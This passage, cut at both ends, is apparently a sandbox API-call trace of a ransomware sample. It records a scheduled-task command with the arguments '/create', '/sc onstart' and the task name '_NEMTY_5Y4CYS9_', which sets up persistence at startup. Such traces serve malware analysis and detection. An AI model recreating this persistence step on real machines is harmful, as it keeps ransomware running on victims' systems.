cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="?") returned 1 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="create") returned 6 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="delete") returned 6 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="query") returned 5 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="change") returned 6 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="run") returned 3 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="end") returned 3 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.101] lstrlenW (lpString="showsid") returned 7 [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.102] SetLastError (dwErrCode=0x0) [0071.102] SetLastError (dwErrCode=0x0) [0071.102] lstrlenW (lpString="/create") returned 7 [0071.102] lstrlenW (lpString="-/") returned 2 [0071.102] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.102] lstrlenW (lpString="?") returned 1 [0071.102] lstrlenW (lpString="?") returned 1 [0071.102] GetProcessHeap () returned 0x480000 [0071.102] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494d80 [0071.102] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.102] GetProcessHeap () returned 0x480000 [0071.102] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xa) returned 0x494d98 [0071.102] lstrlenW (lpString="create") returned 6 [0071.102] GetProcessHeap () returned 0x480000 [0071.102] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494db0 [0071.102] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.102] GetProcessHeap () returned 0x480000 [0071.102] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4953c8 [0071.102] _vsnwprintf (in: _Buffer=0x494d98, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|?|") returned 3 [0071.102] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|create|") returned 8 [0071.102] lstrlenW (lpString="|?|") returned 3 [0071.102] lstrlenW (lpString="|create|") returned 8 [0071.102] SetLastError (dwErrCode=0x490) [0071.102] lstrlenW (lpString="create") returned 6 [0071.102] lstrlenW (lpString="create") returned 6 [0071.102] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.102] GetProcessHeap () returned 0x480000 [0071.102] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494d98) returned 1 [0071.102] GetProcessHeap () returned 0x480000 [0071.102] RtlReAllocateHeap (Heap=0x480000, Flags=0xc, Ptr=0x494d98, Size=0x14) returned 0x4953e8 [0071.102] lstrlenW (lpString="create") returned 6 [0071.102] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.102] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|create|") returned 8 [0071.102] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|create|") returned 8 [0071.103] lstrlenW (lpString="|create|") returned 8 [0071.103] lstrlenW (lpString="|create|") returned 8 [0071.103] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0071.103] SetLastError (dwErrCode=0x0) [0071.103] SetLastError (dwErrCode=0x0) [0071.103] SetLastError (dwErrCode=0x0) [0071.103] lstrlenW (lpString="/sc") returned 3 [0071.103] lstrlenW (lpString="-/") returned 2 [0071.103] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.103] lstrlenW (lpString="?") returned 1 [0071.103] lstrlenW (lpString="?") returned 1 [0071.103] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.103] lstrlenW (lpString="sc") returned 2 [0071.103] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.103] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|?|") returned 3 [0071.103] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.103] lstrlenW (lpString="|?|") returned 3 [0071.103] lstrlenW (lpString="|sc|") returned 4 [0071.103] SetLastError (dwErrCode=0x490) [0071.103] lstrlenW (lpString="create") returned 6 [0071.103] lstrlenW (lpString="create") returned 6 [0071.103] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.103] lstrlenW (lpString="sc") returned 2 [0071.103] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.103] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|create|") returned 8 [0071.103] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.103] lstrlenW (lpString="|create|") returned 8 [0071.103] lstrlenW (lpString="|sc|") returned 4 [0071.103] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0071.103] SetLastError (dwErrCode=0x490) [0071.103] lstrlenW (lpString="delete") returned 6 [0071.103] lstrlenW (lpString="delete") returned 6 [0071.103] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.103] lstrlenW (lpString="sc") returned 2 [0071.103] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.104] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|delete|") returned 8 [0071.104] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.104] lstrlenW (lpString="|delete|") returned 8 [0071.104] lstrlenW (lpString="|sc|") returned 4 [0071.104] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0071.104] SetLastError (dwErrCode=0x490) [0071.104] lstrlenW (lpString="query") returned 5 [0071.104] lstrlenW (lpString="query") returned 5 [0071.104] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.104] lstrlenW (lpString="sc") returned 2 [0071.104] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.104] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|query|") returned 7 [0071.104] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.104] lstrlenW (lpString="|query|") returned 7 [0071.104] lstrlenW (lpString="|sc|") returned 4 [0071.104] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0071.104] SetLastError (dwErrCode=0x490) [0071.104] lstrlenW (lpString="change") returned 6 [0071.104] lstrlenW (lpString="change") returned 6 [0071.104] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.104] lstrlenW (lpString="sc") returned 2 [0071.104] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.104] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|change|") returned 8 [0071.104] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.104] lstrlenW (lpString="|change|") returned 8 [0071.104] lstrlenW (lpString="|sc|") returned 4 [0071.104] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0071.104] SetLastError (dwErrCode=0x490) [0071.104] lstrlenW (lpString="run") returned 3 [0071.104] lstrlenW (lpString="run") returned 3 [0071.104] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.104] lstrlenW (lpString="sc") returned 2 [0071.104] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.105] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|run|") returned 5 [0071.105] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.105] lstrlenW (lpString="|run|") returned 5 [0071.105] lstrlenW (lpString="|sc|") returned 4 [0071.105] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0071.105] SetLastError (dwErrCode=0x490) [0071.105] lstrlenW (lpString="end") returned 3 [0071.105] lstrlenW (lpString="end") returned 3 [0071.105] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.105] lstrlenW (lpString="sc") returned 2 [0071.105] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.105] _vsnwprintf (in: _Buffer=0x4953e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|end|") returned 5 [0071.105] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.105] lstrlenW (lpString="|end|") returned 5 [0071.105] lstrlenW (lpString="|sc|") returned 4 [0071.105] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0071.105] SetLastError (dwErrCode=0x490) [0071.105] lstrlenW (lpString="showsid") returned 7 [0071.105] lstrlenW (lpString="showsid") returned 7 [0071.105] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.105] GetProcessHeap () returned 0x480000 [0071.105] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4953e8) returned 1 [0071.105] GetProcessHeap () returned 0x480000 [0071.105] RtlReAllocateHeap (Heap=0x480000, Flags=0xc, Ptr=0x4953e8, Size=0x16) returned 0x495408 [0071.105] lstrlenW (lpString="sc") returned 2 [0071.105] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.105] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|showsid|") returned 9 [0071.105] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|sc|") returned 4 [0071.105] lstrlenW (lpString="|showsid|") returned 9 [0071.105] lstrlenW (lpString="|sc|") returned 4 [0071.105] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0071.105] SetLastError (dwErrCode=0x490) [0071.105] SetLastError (dwErrCode=0x490) [0071.105] SetLastError (dwErrCode=0x0) [0071.105] lstrlenW (lpString="/sc") returned 3 [0071.105] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0071.106] SetLastError (dwErrCode=0x490) [0071.106] SetLastError (dwErrCode=0x0) [0071.106] lstrlenW (lpString="/sc") returned 3 [0071.106] GetProcessHeap () returned 0x480000 [0071.106] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x8) returned 0x496a08 [0071.106] GetProcessHeap () returned 0x480000 [0071.106] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4953e8 [0071.106] SetLastError (dwErrCode=0x0) [0071.106] SetLastError (dwErrCode=0x0) [0071.106] lstrlenW (lpString="onstart") returned 7 [0071.106] lstrlenW (lpString="-/") returned 2 [0071.106] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0071.106] SetLastError (dwErrCode=0x490) [0071.106] SetLastError (dwErrCode=0x490) [0071.106] SetLastError (dwErrCode=0x0) [0071.106] lstrlenW (lpString="onstart") returned 7 [0071.106] StrChrIW (lpStart="onstart", wMatch=0x3a) returned 0x0 [0071.106] SetLastError (dwErrCode=0x490) [0071.106] SetLastError (dwErrCode=0x0) [0071.106] lstrlenW (lpString="onstart") returned 7 [0071.106] GetProcessHeap () returned 0x480000 [0071.106] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494d98 [0071.106] GetProcessHeap () returned 0x480000 [0071.106] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495428 [0071.106] SetLastError (dwErrCode=0x0) [0071.106] SetLastError (dwErrCode=0x0) [0071.106] lstrlenW (lpString="/tn") returned 3 [0071.106] lstrlenW (lpString="-/") returned 2 [0071.106] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.106] lstrlenW (lpString="?") returned 1 [0071.106] lstrlenW (lpString="?") returned 1 [0071.106] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.106] lstrlenW (lpString="tn") returned 2 [0071.106] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.106] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|?|") returned 3 [0071.106] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.106] lstrlenW (lpString="|?|") returned 3 [0071.106] lstrlenW (lpString="|tn|") returned 4 [0071.107] SetLastError (dwErrCode=0x490) [0071.107] lstrlenW (lpString="create") returned 6 [0071.107] lstrlenW (lpString="create") returned 6 [0071.107] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.107] lstrlenW (lpString="tn") returned 2 [0071.107] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.107] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|create|") returned 8 [0071.107] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.107] lstrlenW (lpString="|create|") returned 8 [0071.107] lstrlenW (lpString="|tn|") returned 4 [0071.107] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0071.107] SetLastError (dwErrCode=0x490) [0071.107] lstrlenW (lpString="delete") returned 6 [0071.107] lstrlenW (lpString="delete") returned 6 [0071.107] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.107] lstrlenW (lpString="tn") returned 2 [0071.107] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.107] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|delete|") returned 8 [0071.107] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.107] lstrlenW (lpString="|delete|") returned 8 [0071.107] lstrlenW (lpString="|tn|") returned 4 [0071.107] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0071.107] SetLastError (dwErrCode=0x490) [0071.107] lstrlenW (lpString="query") returned 5 [0071.107] lstrlenW (lpString="query") returned 5 [0071.107] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.107] lstrlenW (lpString="tn") returned 2 [0071.107] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.107] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|query|") returned 7 [0071.107] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.107] lstrlenW (lpString="|query|") returned 7 [0071.107] lstrlenW (lpString="|tn|") returned 4 [0071.107] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0071.107] SetLastError (dwErrCode=0x490) [0071.108] lstrlenW (lpString="change") returned 6 [0071.108] lstrlenW (lpString="change") returned 6 [0071.108] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.108] lstrlenW (lpString="tn") returned 2 [0071.108] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.108] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|change|") returned 8 [0071.108] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.108] lstrlenW (lpString="|change|") returned 8 [0071.108] lstrlenW (lpString="|tn|") returned 4 [0071.108] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0071.108] SetLastError (dwErrCode=0x490) [0071.108] lstrlenW (lpString="run") returned 3 [0071.108] lstrlenW (lpString="run") returned 3 [0071.108] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.108] lstrlenW (lpString="tn") returned 2 [0071.108] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.108] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|run|") returned 5 [0071.108] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.108] lstrlenW (lpString="|run|") returned 5 [0071.108] lstrlenW (lpString="|tn|") returned 4 [0071.108] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0071.108] SetLastError (dwErrCode=0x490) [0071.108] lstrlenW (lpString="end") returned 3 [0071.108] lstrlenW (lpString="end") returned 3 [0071.108] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.108] lstrlenW (lpString="tn") returned 2 [0071.108] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.108] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|end|") returned 5 [0071.108] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.108] lstrlenW (lpString="|end|") returned 5 [0071.108] lstrlenW (lpString="|tn|") returned 4 [0071.108] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0071.108] SetLastError (dwErrCode=0x490) [0071.108] lstrlenW (lpString="showsid") returned 7 [0071.109] lstrlenW (lpString="showsid") returned 7 [0071.109] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.109] lstrlenW (lpString="tn") returned 2 [0071.109] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.109] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|showsid|") returned 9 [0071.109] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tn|") returned 4 [0071.109] lstrlenW (lpString="|showsid|") returned 9 [0071.109] lstrlenW (lpString="|tn|") returned 4 [0071.109] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0071.109] SetLastError (dwErrCode=0x490) [0071.109] SetLastError (dwErrCode=0x490) [0071.109] SetLastError (dwErrCode=0x0) [0071.109] lstrlenW (lpString="/tn") returned 3 [0071.109] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0071.109] SetLastError (dwErrCode=0x490) [0071.109] SetLastError (dwErrCode=0x0) [0071.109] lstrlenW (lpString="/tn") returned 3 [0071.109] GetProcessHeap () returned 0x480000 [0071.109] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x8) returned 0x496a18 [0071.109] GetProcessHeap () returned 0x480000 [0071.109] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495448 [0071.109] SetLastError (dwErrCode=0x0) [0071.109] SetLastError (dwErrCode=0x0) [0071.109] lstrlenW (lpString="_NEMTY_5Y4CYS9_") returned 15 [0071.109] lstrlenW (lpString="-/") returned 2 [0071.109] StrChrIW (lpStart="-/", wMatch=0x5f) returned 0x0 [0071.109] SetLastError (dwErrCode=0x490) [0071.109] SetLastError (dwErrCode=0x490) [0071.109] SetLastError (dwErrCode=0x0) [0071.109] lstrlenW (lpString="_NEMTY_5Y4CYS9_") returned 15 [0071.109] StrChrIW (lpStart="_NEMTY_5Y4CYS9_", wMatch=0x3a) returned 0x0 [0071.109] SetLastError (dwErrCode=0x490) [0071.109] SetLastError (dwErrCode=0x0) [0071.109] lstrlenW (lpString="_NEMTY_5Y4CYS9_") returned 15 [0071.109] GetProcessHeap () returned 0x480000 [0071.109] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x20) returned 0x493af8 [0071.109] GetProcessHeap () returned 0x480000 [0071.109] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495468 [0071.110] SetLastError (dwErrCode=0x0) [0071.110] SetLastError (dwErrCode=0x0) [0071.110] lstrlenW (lpString="/tr") returned 3 [0071.110] lstrlenW (lpString="-/") returned 2 [0071.110] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.110] lstrlenW (lpString="?") returned 1 [0071.110] lstrlenW (lpString="?") returned 1 [0071.110] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.110] lstrlenW (lpString="tr") returned 2 [0071.110] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.110] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|?|") returned 3 [0071.110] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.110] lstrlenW (lpString="|?|") returned 3 [0071.110] lstrlenW (lpString="|tr|") returned 4 [0071.110] SetLastError (dwErrCode=0x490) [0071.110] lstrlenW (lpString="create") returned 6 [0071.110] lstrlenW (lpString="create") returned 6 [0071.110] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.110] lstrlenW (lpString="tr") returned 2 [0071.110] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.110] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|create|") returned 8 [0071.110] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.110] lstrlenW (lpString="|create|") returned 8 [0071.110] lstrlenW (lpString="|tr|") returned 4 [0071.110] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0071.110] SetLastError (dwErrCode=0x490) [0071.110] lstrlenW (lpString="delete") returned 6 [0071.110] lstrlenW (lpString="delete") returned 6 [0071.110] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.110] lstrlenW (lpString="tr") returned 2 [0071.110] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.110] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|delete|") returned 8 [0071.110] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.110] lstrlenW (lpString="|delete|") returned 8 [0071.111] lstrlenW (lpString="|tr|") returned 4 [0071.111] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0071.111] SetLastError (dwErrCode=0x490) [0071.111] lstrlenW (lpString="query") returned 5 [0071.111] lstrlenW (lpString="query") returned 5 [0071.111] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.111] lstrlenW (lpString="tr") returned 2 [0071.111] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.111] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|query|") returned 7 [0071.111] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.111] lstrlenW (lpString="|query|") returned 7 [0071.111] lstrlenW (lpString="|tr|") returned 4 [0071.111] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0071.111] SetLastError (dwErrCode=0x490) [0071.111] lstrlenW (lpString="change") returned 6 [0071.111] lstrlenW (lpString="change") returned 6 [0071.111] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.111] lstrlenW (lpString="tr") returned 2 [0071.111] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.111] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|change|") returned 8 [0071.111] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.111] lstrlenW (lpString="|change|") returned 8 [0071.111] lstrlenW (lpString="|tr|") returned 4 [0071.111] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0071.111] SetLastError (dwErrCode=0x490) [0071.111] lstrlenW (lpString="run") returned 3 [0071.111] lstrlenW (lpString="run") returned 3 [0071.111] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.111] lstrlenW (lpString="tr") returned 2 [0071.111] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.111] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|run|") returned 5 [0071.111] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.111] lstrlenW (lpString="|run|") returned 5 [0071.111] lstrlenW (lpString="|tr|") returned 4 [0071.112] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0071.112] SetLastError (dwErrCode=0x490) [0071.112] lstrlenW (lpString="end") returned 3 [0071.112] lstrlenW (lpString="end") returned 3 [0071.112] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.112] lstrlenW (lpString="tr") returned 2 [0071.112] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.112] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|end|") returned 5 [0071.112] _vsnwprintf (in: 